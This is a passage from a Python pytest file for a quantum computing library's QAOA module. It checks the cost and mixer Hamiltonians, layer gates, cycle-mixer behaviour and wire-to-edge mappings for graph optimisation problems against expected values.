qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(1),
qml.PauliZ(2),
],
),
qml.Hamiltonian(
[-0.5, -0.5, -0.5],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliZ(1) @ qml.PauliZ(2),
],
),
qml.Hamiltonian([1, 1, 1], [qml.Identity(0), qml.Identity(1), qml.Identity(2)]),
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, -0.25, -0.25],
[
qml.PauliZ("b") @ qml.PauliZ(1),
qml.PauliZ("b"),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2.3),
qml.PauliZ(1),
qml.PauliZ(2.3),
],
),
qml.Hamiltonian([1, 1, 1], [qml.Identity(0), qml.Identity(1), qml.Identity(2)]),
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, -0.25, -0.25],
[
qml.PauliZ("b") @ qml.PauliZ(1),
qml.PauliZ("b"),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2.3),
qml.PauliZ(1),
qml.PauliZ(2.3),
],
),
]
EDGE_DRIVER = zip(GRAPHS, REWARDS, HAMILTONIANS)
"""GENERATES THE CASES TO TEST THE MAXIMUM WEIGHTED CYCLE PROBLEM"""
digraph_complete = nx.complete_graph(3).to_directed()
complete_edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(digraph_complete.edges)}
for k, v in complete_edge_weight_data.items():
digraph_complete[k[0]][k[1]]["weight"] = v
digraph_complete_rx = rx.generators.directed_mesh_graph(3, [0, 1, 2])
complete_edge_weight_data = {
edge: (i + 1) * 0.5 for i, edge in enumerate(sorted(digraph_complete_rx.edge_list()))
}
for k, v in complete_edge_weight_data.items():
digraph_complete_rx.update_edge(k[0], k[1], {"weight": v})
DIGRAPHS = [digraph_complete] * 2
MWC_CONSTRAINED = [True, False]
COST_COEFFS = [
[
-0.6931471805599453,
0.0,
0.4054651081081644,
0.6931471805599453,
0.9162907318741551,
1.0986122886681098,
],
[
-6.693147180559945,
-6.0,
-5.594534891891835,
-5.306852819440055,
-5.083709268125845,
-4.90138771133189,
54,
12,
-12,
-6,
-6,
-12,
6,
12,
-6,
-6,
-12,
6,
12,
-6,
-6,
6,
],
]
COST_TERMS = [
[
qml.PauliZ(wires=[0]),
qml.PauliZ(wires=[1]),
qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[5]),
],
[
qml.PauliZ(wires=[0]),
qml.PauliZ(wires=[1]),
qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[5]),
qml.Identity(wires=[0]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[1]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[2]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[2]) @ qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[2]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[3]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[4]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[3]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[3]),
],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(2)]
MIXER_COEFFS = [
[
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
],
[1] * 6,
]
MIXER_TERMS = [
[
qml.PauliX(wires=[0]) @ qml.PauliX(wires=[1]) @ qml.PauliX(wires=[5]),
qml.PauliY(wires=[0]) @ qml.PauliY(wires=[1]) @ qml.PauliX(wires=[5]),
qml.PauliY(wires=[0]) @ qml.PauliX(wires=[1]) @ qml.PauliY(wires=[5]),
qml.PauliX(wires=[0]) @ qml.PauliY(wires=[1]) @ qml.PauliY(wires=[5]),
qml.PauliX(wires=[1]) @ qml.PauliX(wires=[0]) @ qml.PauliX(wires=[3]),
qml.PauliY(wires=[1]) @ qml.PauliY(wires=[0]) @ qml.PauliX(wires=[3]),
qml.PauliY(wires=[1]) @ qml.PauliX(wires=[0]) @ qml.PauliY(wires=[3]),
qml.PauliX(wires=[1]) @ qml.PauliY(wires=[0]) @ qml.PauliY(wires=[3]),
qml.PauliX(wires=[2]) @ qml.PauliX(wires=[3]) @ qml.PauliX(wires=[4]),
qml.PauliY(wires=[2]) @ qml.PauliY(wires=[3]) @ qml.PauliX(wires=[4]),
qml.PauliY(wires=[2]) @ qml.PauliX(wires=[3]) @ qml.PauliY(wires=[4]),
qml.PauliX(wires=[2]) @ qml.PauliY(wires=[3]) @ qml.PauliY(wires=[4]),
qml.PauliX(wires=[3]) @ qml.PauliX(wires=[2]) @ qml.PauliX(wires=[1]),
qml.PauliY(wires=[3]) @ qml.PauliY(wires=[2]) @ qml.PauliX(wires=[1]),
qml.PauliY(wires=[3]) @ qml.PauliX(wires=[2]) @ qml.PauliY(wires=[1]),
qml.PauliX(wires=[3]) @ qml.PauliY(wires=[2]) @ qml.PauliY(wires=[1]),
qml.PauliX(wires=[4]) @ qml.PauliX(wires=[5]) @ qml.PauliX(wires=[2]),
qml.PauliY(wires=[4]) @ qml.PauliY(wires=[5]) @ qml.PauliX(wires=[2]),
qml.PauliY(wires=[4]) @ qml.PauliX(wires=[5]) @ qml.PauliY(wires=[2]),
qml.PauliX(wires=[4]) @ qml.PauliY(wires=[5]) @ qml.PauliY(wires=[2]),
qml.PauliX(wires=[5]) @ qml.PauliX(wires=[4]) @ qml.PauliX(wires=[0]),
qml.PauliY(wires=[5]) @ qml.PauliY(wires=[4]) @ qml.PauliX(wires=[0]),
qml.PauliY(wires=[5]) @ qml.PauliX(wires=[4]) @ qml.PauliY(wires=[0]),
qml.PauliX(wires=[5]) @ qml.PauliY(wires=[4]) @ qml.PauliY(wires=[0]),
],
[qml.PauliX(wires=i) for i in range(6)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(2)]
MAPPINGS = [qaoa.cycle.wires_to_edges(digraph_complete)] * 2
MWC = list(zip(DIGRAPHS, MWC_CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS, MAPPINGS))
def decompose_hamiltonian(hamiltonian):
coeffs = list(qml.math.toarray(hamiltonian.coeffs))
ops = [i.name for i in hamiltonian.ops]
wires = [i.wires for i in hamiltonian.ops]
return [coeffs, ops, wires]
class TestCostHamiltonians:
"""Tests that the cost Hamiltonians are being generated correctly"""
"""Tests the cost Hamiltonian components"""
def test_bit_driver_error(self):
"""Tests that the bit driver Hamiltonian throws the correct error"""
with pytest.raises(ValueError, match=r"'b' must be either 0 or 1"):
qaoa.bit_driver(range(3), 2)
def test_bit_driver_output(self):
"""Tests that the bit driver Hamiltonian has the correct output"""
H = qaoa.bit_driver(range(3), 1)
hamiltonian = qml.Hamiltonian([1, 1, 1], [qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)])
assert decompose_hamiltonian(H) == decompose_hamiltonian(hamiltonian)
def test_edge_driver_errors(self):
"""Tests that the edge driver Hamiltonian throws the correct errors"""
with pytest.raises(
ValueError, match=r"Encountered invalid entry in 'reward', expected 2-bit bitstrings."
):
qaoa.edge_driver(g1, ["10", "11", 21, "g"])
with pytest.raises(
ValueError,
match=r"'reward' cannot contain either '10' or '01', must contain neither or both.",
):
qaoa.edge_driver(g1, ["11", "00", "01"])
with pytest.raises(ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph"):
qaoa.edge_driver([(0, 1), (1, 2)], ["00", "11"])
@pytest.mark.parametrize(("graph", "reward", "hamiltonian"), EDGE_DRIVER)
def test_edge_driver_output(self, graph, reward, hamiltonian):
"""Tests that the edge driver Hamiltonian throws the correct errors"""
H = qaoa.edge_driver(graph, reward)
assert decompose_hamiltonian(H) == decompose_hamiltonian(hamiltonian)
"""Tests the cost Hamiltonians"""
def test_max_weight_cycle_errors(self):
"""Tests that the max weight cycle Hamiltonian throws the correct errors"""
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
qaoa.max_weight_cycle([(0, 1), (1, 2)])
def test_cost_graph_error(self):
"""Tests that the cost Hamiltonians throw the correct error"""
graph = [(0, 1), (1, 2)]
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.maxcut(graph)
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.max_independent_set(graph)
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.min_vertex_cover(graph)
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.max_clique(graph)
@pytest.mark.parametrize(("graph", "cost_hamiltonian", "mixer_hamiltonian"), MAXCUT)
def test_maxcut_output(self, graph, cost_hamiltonian, mixer_hamiltonian):
"""Tests that the output of the MaxCut method is correct"""
cost_h, mixer_h = qaoa.maxcut(graph)
assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
@pytest.mark.parametrize("constrained", [True, False])
def test_maxcut_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
graph = MAXCUT[0][0]
cost_h, _ = qaoa.maxcut(graph)
# check that all observables commute
assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
# check that the 1-group grouping information was set
assert cost_h.grouping_indices is not None
assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
@pytest.mark.parametrize(("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian"), MIS)
def test_mis_output(self, graph, constrained, cost_hamiltonian, mixer_hamiltonian):
"""Tests that the output of the Max Indepenent Set method is correct"""
cost_h, mixer_h = qaoa.max_independent_set(graph, constrained=constrained)
assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
@pytest.mark.parametrize("constrained", [True, False])
def test_mis_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
graph = MIS[0][0]
cost_h, _ = qaoa.max_independent_set(graph)
# check that all observables commute
assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
# check that the 1-group grouping information was set
assert cost_h.grouping_indices is not None
assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
@pytest.mark.parametrize(("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian"), MVC)
def test_mvc_output(self, graph, constrained, cost_hamiltonian, mixer_hamiltonian):
"""Tests that the output of the Min Vertex Cover method is correct"""
cost_h, mixer_h = qaoa.min_vertex_cover(graph, constrained=constrained)
assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
@pytest.mark.parametrize("constrained", [True, False])
def test_mvc_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
graph = MVC[0][0]
cost_h, _ = qaoa.min_vertex_cover(graph)
# check that all observables commute
assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
# check that the 1-group grouping information was set
assert cost_h.grouping_indices is not None
assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
@pytest.mark.parametrize(
("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian"), MAXCLIQUE
)
def test_max_clique_output(self, graph, constrained, cost_hamiltonian, mixer_hamiltonian):
"""Tests that the output of the Maximum Clique method is correct"""
cost_h, mixer_h = qaoa.max_clique(graph, constrained=constrained)
assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
@pytest.mark.parametrize("constrained", [True, False])
def test_max_clique_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
graph = MAXCLIQUE[0][0]
cost_h, _ = qaoa.max_clique(graph)
# check that all observables commute
assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
# check that the 1-group grouping information was set
assert cost_h.grouping_indices is not None
assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
@pytest.mark.parametrize(
("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian", "mapping"), MWC
)
def test_max_weight_cycle_output(
self, graph, constrained, cost_hamiltonian, mixer_hamiltonian, mapping
):
"""Tests that the output of the maximum weighted cycle method is correct"""
cost_h, mixer_h, m = qaoa.max_weight_cycle(graph, constrained=constrained)
assert mapping == m
c1, t1, w1 = decompose_hamiltonian(cost_hamiltonian)
c2, t2, w2 = decompose_hamiltonian(cost_h)
# There may be a very small numeric difference in the coeffs
assert np.allclose(c1, c2)
assert t1 == t2
assert w1 == w2
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
@pytest.mark.parametrize("constrained", [True, False])
def test_max_weight_cycle_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
graph = MWC[0][0]
cost_h, _, _ = qaoa.max_weight_cycle(graph)
# check that all observables commute
assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
# check that the 1-group grouping information was set
assert cost_h.grouping_indices is not None
assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
class TestUtils:
"""Tests that the utility functions are working properly"""
@pytest.mark.parametrize(
("hamiltonian", "value"),
(
(qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliZ(1)]), True),
(qml.Hamiltonian([1, 1], [qml.PauliX(0), qml.PauliZ(1)]), False),
(qml.Hamiltonian([1, 1], [qml.PauliZ(0) @ qml.Identity(1), qml.PauliZ(1)]), True),
(qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliX(0) @ qml.PauliZ(1)]), False),
),
)
def test_diagonal_terms(self, hamiltonian, value):
assert qaoa.layers._diagonal_terms(hamiltonian) == value
class TestLayers:
"""Tests that the cost and mixer layers are being constructed properly"""
def test_mixer_layer_errors(self):
"""Tests that the mixer layer is throwing the correct errors"""
hamiltonian = [[1, 1], [1, 1]]
with pytest.raises(ValueError, match=r"hamiltonian must be of type pennylane.Hamiltonian"):
qaoa.mixer_layer(0.1, hamiltonian)
def test_cost_layer_errors(self):
"""Tests that the cost layer is throwing the correct errors"""
hamiltonian = [[1, 1], [1, 1]]
with pytest.raises(ValueError, match=r"hamiltonian must be of type pennylane.Hamiltonian"):
qaoa.cost_layer(0.1, hamiltonian)
hamiltonian = qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliX(1)])
with pytest.raises(
ValueError,
match=r"hamiltonian must be written only in terms of PauliZ and Identity gates",
):
qaoa.cost_layer(0.1, hamiltonian)
@pytest.mark.parametrize(
("mixer", "gates"),
[
[
qml.Hamiltonian([1, 1], [qml.PauliX(0), qml.PauliX(1)]),
[qml.PauliRot(2, "X", wires=[0]), qml.PauliRot(2, "X", wires=[1])],
],
[
qaoa.xy_mixer(Graph([(0, 1), (1, 2), (2, 0)])),
[
qml.PauliRot(1, "XX", wires=[0, 1]),
qml.PauliRot(1, "YY", wires=[0, 1]),
qml.PauliRot(1, "XX", wires=[0, 2]),
qml.PauliRot(1, "YY", wires=[0, 2]),
qml.PauliRot(1, "XX", wires=[1, 2]),
qml.PauliRot(1, "YY", wires=[1, 2]),
],
],
],
)
def test_mixer_layer_output(self, mixer, gates):
"""Tests that the gates of the mixer layer are correct"""
alpha = 1
with qml.tape.OperationRecorder() as rec:
qaoa.mixer_layer(alpha, mixer)
rec = rec.expand()
for i, j in zip(rec.operations, gates):
prep = [i.name, i.parameters, i.wires]
target = [j.name, j.parameters, j.wires]
assert prep == target
@pytest.mark.parametrize(
("cost", "gates"),
[
[
qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliZ(1)]),
[qml.PauliRot(2, "Z", wires=[0]), qml.PauliRot(2, "Z", wires=[1])],
],
[
qaoa.maxcut(Graph([(0, 1), (1, 2), (2, 0)]))[0],
[
qml.PauliRot(1, "ZZ", wires=[0, 1]),
qml.PauliRot(1, "ZZ", wires=[0, 2]),
qml.PauliRot(1, "ZZ", wires=[1, 2]),
],
],
],
)
def test_cost_layer_output(self, cost, gates):
"""Tests that the gates of the cost layer is correct"""
gamma = 1
with qml.tape.OperationRecorder() as rec:
qaoa.cost_layer(gamma, cost)
rec = rec.expand()
for i, j in zip(rec.operations, gates):
prep = [i.name, i.parameters, i.wires]
target = [j.name, j.parameters, j.wires]
assert prep == target
class TestIntegration:
"""Test integration of the QAOA module with PennyLane"""
def test_module_example(self, tol):
"""Test the example in the QAOA module docstring"""
# Defines the wires and the graph on which MaxCut is being performed
wires = range(3)
graph = Graph([(0, 1), (1, 2), (2, 0)])
# Defines the QAOA cost and mixer Hamiltonians
cost_h, mixer_h = qaoa.maxcut(graph)
# Defines a layer of the QAOA ansatz from the cost and mixer Hamiltonians
def qaoa_layer(gamma, alpha):
qaoa.cost_layer(gamma, cost_h)
qaoa.mixer_layer(alpha, mixer_h)
# Repeatedly applies layers of the QAOA ansatz
def circuit(params, **kwargs):
for w in wires:
qml.Hadamard(wires=w)
qml.layer(qaoa_layer, 2, params[0], params[1])
# Defines the device and the QAOA cost function
dev = qml.device("default.qubit", wires=len(wires))
cost_function = catch_warn_ExpvalCost(circuit, cost_h, dev)
res = cost_function([[1, 1], [1, 1]])
expected = -1.8260274380964299
assert np.allclose(res, expected, atol=tol, rtol=0)
def test_module_example_rx(self, tol):
"""Test the example in the QAOA module docstring"""
# Defines the wires and the graph on which MaxCut is being performed
wires = range(3)
graph = rx.PyGraph()
graph.add_nodes_from([0, 1, 2])
graph.add_edges_from([(0, 1, ""), (1, 2, ""), (2, 0, "")])
# Defines the QAOA cost and mixer Hamiltonians
cost_h, mixer_h = qaoa.maxcut(graph)
# Defines a layer of the QAOA ansatz from the cost and mixer Hamiltonians
def qaoa_layer(gamma, alpha):
qaoa.cost_layer(gamma, cost_h)
qaoa.mixer_layer(alpha, mixer_h)
# Repeatedly applies layers of the QAOA ansatz
def circuit(params, **kwargs):
for w in wires:
qml.Hadamard(wires=w)
qml.layer(qaoa_layer, 2, params[0], params[1])
# Defines the device and the QAOA cost function
dev = qml.device("default.qubit", wires=len(wires))
cost_function = catch_warn_ExpvalCost(circuit, cost_h, dev)
res = cost_function([[1, 1], [1, 1]])
expected = -1.8260274380964299
assert np.allclose(res, expected, atol=tol, rtol=0)
class TestCycles:
"""Tests that ``cycle`` module functions are behaving correctly"""
@pytest.mark.parametrize("g", [nx.lollipop_graph(4, 1), lollipop_graph_rx(4, 1)])
def test_edges_to_wires(self, g):
"""Test that edges_to_wires returns the correct mapping"""
r = edges_to_wires(g)
assert r == {(0, 1): 0, (0, 2): 1, (0, 3): 2, (1, 2): 3, (1, 3): 4, (2, 3): 5, (3, 4): 6}
def test_edges_to_wires_error(self):
"""Test that edges_to_wires raises ValueError"""
g = [1, 1, 1, 1]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
edges_to_wires(g)
def test_edges_to_wires_rx(self):
"""Test that edges_to_wires returns the correct mapping"""
g = rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])
r = edges_to_wires(g)
assert r == {
(0, 1): 0,
(0, 2): 1,
(0, 3): 2,
(1, 0): 3,
(1, 2): 4,
(1, 3): 5,
(2, 0): 6,
(2, 1): 7,
(2, 3): 8,
(3, 0): 9,
(3, 1): 10,
(3, 2): 11,
}
@pytest.mark.parametrize("g", [nx.lollipop_graph(4, 1), lollipop_graph_rx(4, 1)])
def test_wires_to_edges(self, g):
"""Test that wires_to_edges returns the correct mapping"""
r = wires_to_edges(g)
assert r == {0: (0, 1), 1: (0, 2), 2: (0, 3), 3: (1, 2), 4: (1, 3), 5: (2, 3), 6: (3, 4)}
def test_wires_to_edges_error(self):
"""Test that wires_to_edges raises ValueError"""
g = [1, 1, 1, 1]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
wires_to_edges(g)
def test_wires_to_edges_rx(self):
"""Test that wires_to_edges returns the correct mapping"""
g = rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])
r = wires_to_edges(g)
assert r == {
0: (0, 1),
1: (0, 2),
2: (0, 3),
3: (1, 0),
4: (1, 2),
5: (1, 3),
6: (2, 0),
7: (2, 1),
8: (2, 3),
9: (3, 0),
10: (3, 1),
11: (3, 2),
}
@pytest.mark.parametrize(
"g",
[nx.complete_graph(4).to_directed(), rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])],
)
def test_partial_cycle_mixer_complete(self, g):
"""Test if the _partial_cycle_mixer function returns the expected Hamiltonian for a fixed
example"""
edge = (0, 1)
h = _partial_cycle_mixer(g, edge)
ops_expected = [
qml.PauliX(0) @ qml.PauliX(1) @ qml.PauliX(7),
qml.PauliY(0) @ qml.PauliY(1) @ qml.PauliX(7),
qml.PauliY(0) @ qml.PauliX(1) @ qml.PauliY(7),
qml.PauliX(0) @ qml.PauliY(1) @ qml.PauliY(7),
qml.PauliX(0) @ qml.PauliX(2) @ qml.PauliX(10),
qml.PauliY(0) @ qml.PauliY(2) @ qml.PauliX(10),
qml.PauliY(0) @ qml.PauliX(2) @ qml.PauliY(10),
qml.PauliX(0) @ qml.PauliY(2) @ qml.PauliY(10),
]
coeffs_expected = [0.25, 0.25, 0.25, -0.25, 0.25, 0.25, 0.25, -0.25]
assert h.coeffs == coeffs_expected
assert all(op.wires == op_e.wires for op, op_e in zip(h.ops, ops_expected))
assert all(op.name == op_e.name for op, op_e in zip(h.ops, ops_expected))
@pytest.mark.parametrize(
"g",
[nx.complete_graph(4).to_directed(), rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])],
)
def test_partial_cycle_mixer_incomplete(self, g):
"""Test if the _partial_cycle_mixer function returns the expected Hamiltonian for a fixed
example"""
g.remove_edge(2, 1) # remove an egde to make graph incomplete
edge = (0, 1)
h = _partial_cycle_mixer(g, edge)
ops_expected = [
qml.PauliX(0) @ qml.PauliX(2) @ qml.PauliX(9),
qml.PauliY(0) @ qml.PauliY(2) @ qml.PauliX(9),
qml.PauliY(0) @ qml.PauliX(2) @ qml.PauliY(9),
qml.PauliX(0) @ qml.PauliY(2) @ qml.PauliY(9),
]
coeffs_expected = [0.25, 0.25, 0.25, -0.25]
assert h.coeffs == coeffs_expected
assert all(op.wires == op_e.wires for op, op_e in zip(h.ops, ops_expected))
assert all(op.name == op_e.name for op, op_e in zip(h.ops, ops_expected))
@pytest.mark.parametrize("g", [nx.complete_graph(4), rx.generators.mesh_graph(4, [0, 1, 2, 3])])
def test_partial_cycle_mixer_error(self, g):
"""Test if the _partial_cycle_mixer raises ValueError"""
g.remove_edge(2, 1) # remove an egde to make graph incomplete
edge = (0, 1)
# Find Hamiltonian and its matrix representation
with pytest.raises(ValueError, match="Input graph must be a nx.DiGraph or rx.PyDiGraph"):
_partial_cycle_mixer(g, edge)
@pytest.mark.parametrize(
"g",
[nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])],
)
def test_cycle_mixer(self, g):
"""Test if the cycle_mixer Hamiltonian maps valid cycles to valid cycles"""
n_nodes = 3
m = wires_to_edges(g)
n_wires = len(graph.edge_list() if isinstance(graph, rx.PyDiGraph) else graph.edges)
# Find Hamiltonian and its matrix representation
h = cycle_mixer(g)
h_matrix = np.real_if_close(matrix(h, n_wires).toarray())
# Decide which bitstrings are valid and which are invalid
valid_bitstrings_indx = []
invalid_bitstrings_indx = []
for indx, bitstring in enumerate(itertools.product([0, 1], repeat=n_wires)):
wires = [i for i, bit in enumerate(bitstring) if bit == 1]
edges = [m[wire] for wire in wires]
flows = [0 for i in range(n_nodes)]
for start, end in edges:
flows[start] += 1
flows[end] -= 1
# A bitstring is valid if the net flow is zero and we aren't the empty set or the set
# of all edges. Note that the max out-flow constraint is not imposed, which means we can
# pass through nodes more than once
if sum(np.abs(flows)) == 0 and 0 < len(edges) < n_wires:
valid_bitstrings_indx.append(indx)
else:
invalid_bitstrings_indx.append(indx)
# Check that valid bitstrings map to a subset of the valid bitstrings
for indx in valid_bitstrings_indx:
column = h_matrix[:, indx]
destination_indxs = set(np.argwhere(column != 0).flatten())
assert destination_indxs.issubset(valid_bitstrings_indx)
# Check that invalid bitstrings map to a subset of the invalid bitstrings
for indx in invalid_bitstrings_indx:
column = h_matrix[:, indx]
destination_indxs = set(np.argwhere(column != 0).flatten())
assert destination_indxs.issubset(invalid_bitstrings_indx)
# Now consider a unitary generated by the Hamiltonian
h_matrix_e = expm(1j * h_matrix)
# We expect non-zero transitions among the set of valid bitstrings, and no transitions
# outside
for indx in valid_bitstrings_indx:
column = h_matrix_e[:, indx]
destination_indxs = np.argwhere(column != 0).flatten().tolist()
assert destination_indxs == valid_bitstrings_indx
# Check that invalid bitstrings transition within the set of invalid bitstrings
for indx in invalid_bitstrings_indx:
column = h_matrix_e[:, indx]
destination_indxs = set(np.argwhere(column != 0).flatten().tolist())
assert destination_indxs.issubset(invalid_bitstrings_indx)
@pytest.mark.parametrize(
"g",
[nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])],
)
def test_cycle_mixer_error(self, g):
"""Test if the cycle_mixer raises ValueError"""
# Find Hamiltonian and its matrix representation
with pytest.raises(ValueError, match="Input graph must be a nx.DiGraph or rx.PyDiGraph"):
cycle_mixer(g)
@pytest.mark.parametrize("g", [nx.lollipop_graph(3, 1), lollipop_graph_rx(3, 1)])
def test_matrix(self, g):
"""Test that the matrix function works as expected on a fixed example"""
h = qml.qaoa.bit_flip_mixer(g, 0)
mat = matrix(h, 4)
mat_expected = np.array(
[
[0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
assert np.allclose(mat.toarray(), mat_expected)
def test_matrix_rx(self):
"""Test that the matrix function works as expected on a fixed example"""
g = rx.generators.star_graph(4, [0, 1, 2, 3])
h = qml.qaoa.bit_flip_mixer(g, 0)
mat = matrix(h, 4)
mat_expected = np.array(
[
[0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
